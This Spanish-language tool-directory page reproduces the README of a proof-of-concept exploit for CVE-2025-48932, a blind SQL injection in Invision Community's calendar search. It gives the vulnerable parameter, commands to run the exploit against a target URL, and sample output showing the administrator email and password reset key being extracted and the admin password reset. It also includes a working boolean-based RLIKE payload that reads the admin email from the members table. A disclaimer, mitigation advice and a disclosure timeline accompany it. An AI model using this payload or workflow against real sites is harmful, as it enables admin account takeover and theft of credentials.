Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-48932---exploit — Prueba de concepto de exploit para CVE-2025-48932, una inyección SQL en Invision Community <= 4.7.20. Extrae credenciales de administrador y restablece contraseñas mediante SQLi ciega. Solo para pruebas autorizadas. | Kitploit
Herramientas/GitHubGitHub/xploitgh0st/cve-2025-48932---exploit
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y Educación
GitHubxploitgh0st/cve-2025-48932---exploit

CVE-2025-48932---exploit

Prueba de concepto de exploit para CVE-2025-48932, una inyección SQL en Invision Community <= 4.7.20. Extrae credenciales de administrador y restablece contraseñas mediante SQLi ciega. Solo para pruebas autorizadas.

Ver Repositorio
2hace 9 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Explotación de inyección SQL en Invision Community (CVE-2025-48932)

Python Version License CVE

Un exploit de prueba de concepto que demuestra una vulnerabilidad de inyección SQL en Invision Community versiones <= 4.7.20.

⚠️ Descargo de responsabilidad

Esta herramienta se proporciona únicamente con fines educativos y de pruebas de seguridad autorizadas.

  • El acceso no autorizado a sistemas informáticos es ILEGAL
  • Utilice esta herramienta únicamente en sistemas que le pertenezcan o para los que tenga permiso explícito por escrito para realizar pruebas
  • El autor NO ES RESPONSABLE de ningún mal uso o daño causado por esta herramienta
  • Está destinada únicamente a investigadores de seguridad, pentesters y fines educativos

📋 Tabla de contenidos

Vulnerability Description
  • Requirements
  • Installation
  • Usage
  • How It Works
  • Mitigation
  • Credits
  • References
  • 🔍 Descripción de la vulnerabilidad

    CVE ID: CVE-2025-48932
    Gravedad: Alta
    Puntuación CVSS: Por determinar
    Versiones afectadas: Invision Community 4.x anteriores a 4.7.21

    La vulnerabilidad existe en el script /applications/calendar/modules/front/calendar/view.php. La entrada del usuario transmitida a través del parámetro de solicitud location en el método IPS\calendar\modules\front\calendar\view::search() no se sanea adecuadamente antes de utilizarse en consultas SQL.

    Esto permite a atacantes remotos no autenticados:

    • Extraer datos sensibles de la base de datos
    • Leer credenciales de administrador
    • Potencialmente lograr la toma de control de la cuenta de administrador

    Requisitos previos para la explotación:

    • La aplicación Calendar debe estar instalada
    • La función GeoLocation (como Google Maps) debe estar configurada

    Nota: Mientras que las vulnerabilidades de inyección SQL en Invision Community 4.x versiones < 4.7.18 podían conducir a la toma de control de la cuenta de administrador y a la ejecución remota de código (RCE) mediante el restablecimiento de la contraseña de administrador, la versión 4.7.18 introdujo una nueva clave de cifrado de seguridad en el mecanismo de restablecimiento de contraseña, lo que dificulta este vector de ataque.

    📦 Requisitos

    • Python 3.7 o superior
    • pip (gestor de paquetes de Python)
    • Conexión a Internet
    • Sistema objetivo que ejecute Invision Community <= 4.7.20 con:
      • Aplicación Calendar instalada
      • Función GeoLocation configurada

    🚀 Instalación

    1. Clonar el repositorio:

      root@kitploit:~
      git clone https://github.com/yourusername/invision-sqli-exploit.git
      cd invision-sqli-exploit
      
    2. Instalar las dependencias:

      root@kitploit:~
      pip install -r requirements.txt
      

    💻 Uso

    Uso básico

    root@kitploit:~
    python invision-sqli-exploit.py -u http://target.com/forum/
    

    Modo verboso (para depuración)

    root@kitploit:~
    python invision-sqli-exploit.py -u https://example.com/community/ -v
    

    Argumentos de línea de comandos

    ArgumentoDescripciónRequerido
    -u, --urlURL base de Invision Community objetivoSí
    -v, --verboseHabilita la salida verbosa para depuraciónNo
    -h, --helpMuestra el mensaje de ayuda y saleNo

    Ejemplo de salida

    root@kitploit:~
    ==================================================
    Invision Community <= 4.7.20 SQL Injection Exploit
    CVE-2025-48932
    ==================================================
    Target: http://example.com/forum/
    ==================================================
    
    [*] Fetching CSRF token...
    [+] CSRF token found: abc123def456...
    [*] Step 1: Extracting admin email address...
    [*] Extracting data: [email protected]
    [+] Admin email: [email protected]
    
    [!] Step 2: Manual action required!
    
    Please follow these steps:
    1. Navigate to: http://example.com/forum/index.php?/lostpassword/
    2. Request a password reset using email: [email protected]
    3. Press ENTER when done...
    
    [*] Step 3: Extracting password reset validation key...
    [*] Extracting data: xyz789abc123...
    [+] Reset key: xyz789abc123...
    [*] Step 4: Resetting admin password...
    
    ==================================================
    [+] EXPLOITATION SUCCESSFUL!
    ==================================================
    
    Admin credentials:
      Email:    [email protected]
      Password: Pwned1721234567
    
    You can now login at: http://example.com/forum/index.php?/login/
    

    🔬 Cómo funciona

    El exploit funciona en cuatro pasos principales:

    1. Extracción del token CSRF

    El script primero obtiene un token CSRF del sitio web objetivo, que es necesario para las solicitudes posteriores.

    2. Inyección SQL ciega basada en booleano

    Mediante un algoritmo de búsqueda binaria, el exploit extrae datos de la base de datos carácter por carácter:

    • Prueba cada carácter usando consultas SQL condicionales
    • Usa la función RLIKE con patrones de expresiones regulares para detectar condiciones verdaderas/falsas
    • Los mensajes de error indican condiciones exitosas

    3. Extracción del correo electrónico del administrador

    Consulta la tabla core_members para extraer la dirección de correo electrónico del administrador.

    4. Explotación del restablecimiento de contraseña

    • El atacante inicia manualmente un restablecimiento de contraseña para la cuenta de administrador
    • El exploit extrae la clave de validación del restablecimiento de contraseña de la base de datos
    • Usa la clave de validación para restablecer la contraseña de administrador sin acceso al correo electrónico

    Detalles técnicos

    Punto de inyección:

    root@kitploit:~
    location parameter → calendar/view.php → search() method
    

    Ejemplo de payload:

    root@kitploit:~
    '))OR(SELECT 1 RLIKE(IF(ORD(SUBSTR((SELECT email FROM core_members WHERE member_id=1),1,1))<128,0x28,0x31)))#
    

    Técnica de explotación: Inyección SQL ciega basada en booleano mediante búsqueda binaria para una extracción de datos eficiente.

    🛡️ Mitigación

    Para usuarios

    Acciones inmediatas:

    1. Actualice a la versión 4.7.21 o posterior - Esta versión corrige la vulnerabilidad
    2. Desactive la aplicación Calendar si no está en uso
    3. Supervise los registros de acceso para detectar actividad sospechosa
    4. Revise las cuentas de administrador para detectar accesos no autorizados

    Para desarrolladores

    Prácticas de codificación segura:

    1. Use consultas parametrizadas / sentencias preparadas - Nunca concatene la entrada del usuario en consultas SQL
    2. Validación de entradas - Valide y sanea todas las entradas del usuario
    3. Principio de mínimo privilegio - Los usuarios de la base de datos deben tener los permisos mínimos necesarios
    4. Firewall de aplicaciones web (WAF) - Implemente reglas WAF para detectar intentos de inyección SQL
    5. Auditorías de seguridad periódicas - Realice revisiones de código y pruebas de penetración de forma regular

    Ejemplo de código seguro:

    root@kitploit:~
    // Vulnerable code
    $location = $_REQUEST['location'];
    $query = "SELECT * FROM events WHERE location = '$location'";
    
    // Secure code
    $location = $_REQUEST['location'];
    $query = $db->prepare("SELECT * FROM events WHERE location = ?");
    $query->execute([$location]);
    

    📅 Cronología de divulgación

    FechaEvento
    16 de mayo de 2025Proveedor notificado
    27 de mayo de 2025Versión 4.7.21 publicada
    28 de mayo de 2025Identificador CVE solicitado
    28 de mayo de 2025CVE-2025-48932 asignado
    23 de julio de 2025Divulgación pública

    👏 Créditos

    Desarrollador:

    • nanda

    Nota: Esta es una implementación independiente basada en información de vulnerabilidad divulgada públicamente (CVE-2025-48932)

    📚 Referencias

    • Detalles de CVE-2025-48932
    • Sitio oficial de Invision Community
    • EDB-ID: 52383

    📝 Licencia

    Este proyecto está licenciado bajo la Licencia MIT; consulte el archivo LICENSE para obtener más detalles.

    🤝 Contribuciones

    ¡Las contribuciones son bienvenidas! No dude en enviar un Pull Request. Para cambios importantes, abra primero un issue para discutir lo que le gustaría cambiar.

    ⚖️ Aviso legal

    Esta herramienta se distribuye bajo la Licencia MIT. Al utilizar este software, usted acepta:

    1. Usarla únicamente con fines de pruebas legales y autorizadas
    2. Asumir toda la responsabilidad por sus acciones
    3. No responsabilizar al autor por ningún mal uso o daño
    4. Cumplir con todas las leyes y regulaciones aplicables

    Recuerde: El acceso no autorizado a sistemas informáticos es un delito en la mayoría de las jurisdicciones y puede acarrear graves consecuencias legales.


    Si descubre una vulnerabilidad de seguridad, notifíquela de forma responsable al proveedor antes de hacerla pública.

    Descargar herramienta